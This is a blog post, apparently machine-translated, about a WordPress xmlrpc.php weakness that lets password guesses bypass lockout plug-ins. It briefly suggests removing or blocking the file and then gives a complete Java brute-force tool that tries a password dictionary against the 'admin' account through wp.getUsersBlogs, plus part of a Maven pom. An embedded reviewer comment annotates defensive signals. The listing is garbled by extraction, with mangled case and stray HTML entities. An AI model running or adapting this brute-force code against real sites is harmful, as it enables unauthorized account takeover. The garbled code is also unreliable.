WordPress xmlrpc.php brute-force vulnerability
WordPress is a very popular open-source blogging platform. It provides a way to publish articles remotely, through the xmlrpc.php file. A weakness in XML-RPC has recently come to wide attention: authentication attempts made through XML-RPC, even failed ones, are not recorded by the security plug-ins installed on WordPress, so the lockout that normally follows n wrong passwords is never triggered. As a result the password can be brute-forced, and if it is a weak password this is quite dangerous. The simplest solution is to delete the xmlrpc.php file. (A WordPress core update puts the file back, so denying access to xmlrpc.php in the web server configuration is a more durable form of the same fix.) Having some idle time, I wrote a brute-force script in Java; all it does is call xmlrpc.php over and over with various usernames and passwords and check the authentication result, which is very simple. It is for entertainment only; everyone should be cautious with brute-force cracking.
Xmlrpc.java source code is as follows:
/*
 * Reviewer notes on this listing.
 *
 * The code below is reproduced exactly as it appears on the page. Extraction or machine
 * translation has altered identifier case, inserted spaces and HTML entities, and collapsed the
 * statements onto a few lines, so it does not compile as shown.
 *
 * What the class does, as far as the visible code shows:
 *   - checkxmlrpcfile: sends a GET for /xmlrpc.php on the given host and reports whether the
 *     response body contains the XML-RPC server banner text.
 *   - forcelogin: POSTs a wp.getusersblogs method call carrying one username and one password,
 *     and treats a response containing the ISAdmin marker as a successful login.
 *   - wrapperurl: returns null for a null or empty input; otherwise drops the first 7 characters
 *     when the input starts with the scheme prefix, then cuts the string at the first slash.
 *   - test: reads a password list file line by line and tries each line as the password for the
 *     user admin, stopping at the first success.
 *
 * Points relevant to defence:
 *   - Every guess is a separate POST to /xmlrpc.php from one client with a fixed Firefox 31
 *     User-Agent string, and the sleep between attempts is commented out. On the server this
 *     would normally appear as a dense run of POSTs to that one path from a single source.
 *   - Requests are built with the plain http scheme, so the guessed credentials travel
 *     unencrypted.
 *   - A username and password that succeed are written to the log in clear text by logger.info.
 *   - username and password are concatenated into the XML request body without escaping.
 *   - The page's own fix is to remove xmlrpc.php; denying or rate-limiting requests to that path
 *     at the web server, and using strong passwords, address the same weakness.
 */
package com.yeetrack.security.wordpress; import org.apache.http.client.clientprotocolexception; import org.apache.http.client.config.requestconfig; import org.apache.http.client.methods.closeablehttpresponse; import org.apache.http.client.methods.httpget; import org.apache.http.client.methods.httppost; import org.apache.http.entity.stringentity; import org.apache.http.impl.client.closeablehttpclient; import org.apache.http.impl.client.httpclients; import org.apache.http.util.entityutils; import org.slf4j.Logger; import org.slf4j.loggerfactory; import org.testng.annotations.test; import java.io.*;&nbsP; /** * created by victor wang on 2014/8/2. * exploit Wordpress xmlrpc vulnerability, brute force password */ public class Xmlrpc { private String userAgent = "mozilla/5.0 (windows nt 6.1; wow64; rv:31.0) gecko/20100101 firefox/31.0 "; requestconfig requestconfig = requestconfig.custom (). Setconnectionrequesttimeout (4000). Setconnecttimeout (4000) .setsockettimeout (4000). Build (); private static logger logger = loggerfactory.getlogger (Xmlrpc.class ); privaTe closeablehttpclient httpclient = httpclients.custom () .setuseragent (userAgent) .setdefaultrequestconfig ( Requestconfig) . Build (); /** * Verify that the domain name exists xmlrpc.php this file */ private boolean checkxmlrpcfile (String domain) { domain = wrapperurl (domain); if ( Domain==null) return false; httpget get = new httpget (" HTTP//"+domain+"/xmlrpc.php "); Get.addheader ("User-agent", useragent); CloseableHttpResponse response = null; String resultString = null; try { response = httpclient.execute (GET); if (null == response | | response.equals ("")) return false; Resultstring = entityutils.tostring (Response.getentity ()); } catch (ioexception e) { e.printstacktrace (); } return resultstring.contains ("xml-rpc server accepts post requests Only. 
"); } /** * Violent attempts */ private boolean forcelogin (string username, string password, string url) { //trying to sign in httppost post = new httppost ("http://" +wrapperurl (URL) + "/xmlrpc.php"); post.addheader ("User-Agent", useragent); string xmlstring = "<?xml version=\" 1.0\ " encoding=\" iso-8859-1\ "?><methodcall> < methodname>wp.getusersblogs</methodname> <params> <param>< Value> "+username+" </value></param> <param><value> "+password+" </ Value></param>&nbSp; </params></methodcall> "; StringEntity entity = null; try { entity = new stringentity (xmlstring); post.setentity (Entity); closeablehttpresponse response = httpclient.execute (POST); string loginresult = entityutils.tostring (Response.getEntity ()); if (null== loginresult | | loginresult.Equals ("")) return false; if (Loginresult.contains ("ISAdmin")) { logger.info (url + "Login successful, Userename---> + username + " password---> " + Password); return true; } } catch (unsupportedencodingexception e) { &nbsP; e.printstacktrace (); } catch (clientprotocolexception e) { e.printstacktrace (); } catch (ioexception e) { e.printstacktrace (); } return false; } /** * clean URL, remove HTTP///or End of path */ private String wrapperurl (String url) { if (null == url | | url.equals ("")) return null; if ( Url.startswith ("http.//")) url = url.substring (7); if (Url.contains ("/")) url = url.substring (0, url.indexof ("/")); return url; } /** * hack */ @Test public void test () { String url = "http://somewordpress.com/xmlrpc.php"; if (!checkxmlrpcfile (URL)) { logger.info (url+ "---> No xmlrpc vulnerability"); return; } file file = new file ("Src/main/resources/1pass00.txt"); //cipher dictionaries, a bunch of these online, Or you can build it yourself or & it.nbsp; try { FileReader fileReader = new FileReader (file); bufferedreader bufferedreader = new bufferedreader (FileReader); String line = null; int count = 1; while ((Line = bufferedreader.readline ()) != null) { System.out.println ("" + count + " 
" + line); if (Forcelogin ("admin", line, url)) break; count++; //thread.sleep (+); } } catch (exception e) { e.printstacktrace (); } } }
The project is managed with Maven and uses Apache's HttpClient and log4j; the pom.xml is as follows:
<?xml version= "1.0" encoding= "UTF-8"?> <project xmlns= "http://maven.apache.org/POM/4.0.0" Xmlns:xs I= "Http://www.w3.org/2001/XMLSchema-instance" xsi:schemalocation= "http://maven.apache.org/POM/4.0.0 Http://mav En.apache.org/xsd/maven-4.0.0.xsd "> <modelVersion>4.0.0</modelVersion> <groupid>com.yee Track.security</groupid> <artifactId>wordpress-xmlrpc</artifactId> <version>1.0-snap Shot</version>